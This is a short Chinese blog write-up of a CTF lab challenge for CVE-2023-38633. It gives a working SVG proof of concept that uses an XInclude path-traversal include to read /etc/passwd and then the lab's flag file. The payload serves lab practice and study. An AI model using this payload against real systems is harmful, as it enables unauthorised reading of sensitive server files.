CVE-2023-38633~XXE注入【春秋云境靶场渗透】

蚂蚱.top

于 2024-08-11 08:00:00 发布

阅读量404

点赞数 13

分类专栏：春秋云境靶场文章标签：网络安全 php apache android

本文链接：https://blog.csdn.net/weixin_67832625/article/details/141091495

版权

春秋云境靶场专栏收录该内容

9 篇文章 0 订阅

订阅专栏

在这里插入图片描述

今天我们来攻克春秋云境CTF的CVE-2023-38633

# 我们通过抓包来构造POC来查找/etc/passwd
<?xml version="1.0" encoding="UTF-8" standalone="no"?>  
<svg width="1000" height="1000" xmlns:xi="http://www.w3.org/2001/XInclude">  
   <rect width="600" height="600" style="fill:rgb(255,255,255);" />  
   <text x="10" y="100">  
     <xi:include href=".?../../../../../../../../etc/passwd" parse="text"   
encoding="UTF-8">  
       <xi:fallback>file not found</xi:fallback>  
     </xi:include>  
   </text>  
</svg>

这样我们就看到了/etc/passwd文件里面的内容

# 既然可以看到/etc/passwd的内容，那我们就可以查看flag
.?../../../../../../../../flag

好小子，离成功又近一步！！！

蚂蚱.top

关注

13
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录